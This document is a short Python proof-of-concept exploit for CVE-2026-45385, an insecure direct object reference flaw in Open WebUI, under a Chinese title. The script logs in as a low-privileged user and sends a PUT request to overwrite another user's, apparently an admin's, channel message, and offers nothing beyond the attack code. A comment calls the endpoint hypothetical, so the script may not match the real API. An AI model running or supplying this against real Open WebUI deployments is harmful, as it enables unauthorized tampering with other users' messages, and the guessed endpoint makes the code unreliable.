CVE-2026-45385 Open WebUI IDOR漏洞

import requests # Target configuration TARGET_URL = "http://localhost:8080" USERNAME = "attacker_user" PASSWORD = "password" def login(): """Authenticate as a low-privileged user.""" session = requests.Session() login_payload = {"username": USERNAME, "password": PASSWORD} response = session.post(f"{TARGET_URL}/api/v1/auths/login", json=login_payload) if response.status_code == 200: print("[+] Login successful") return session else: print("[-] Login failed") exit(1) def exploit_idor(session, channel_id, message_id, new_content): """ Exploit IDOR in update_message_by_id. Only membership is checked, not ownership. """ # Endpoint to update a message (Hypothetical based on description) endpoint = f"{TARGET_URL}/api/v1/channels/{channel_id}/messages/{message_id}" payload = { "content": new_content } # Attempt to update message belonging to another user response = session.put(endpoint, json=payload) if response.status_code == 200: print(f"[+] Successfully modified message {message_id} in channel {channel_id}") print(f"[+] New content: {new_content}") else: print(f"[-] Failed to modify message. Status code: {response.status_code}") if __name__ == "__main__": session = login() # Replace with valid IDs from the target target_channel_id = "target_channel_uuid" target_message_id = "admin_message_uuid" fake_message = "This message has been modified by an unauthorized user." exploit_idor(session, target_channel_id, target_message_id, fake_message)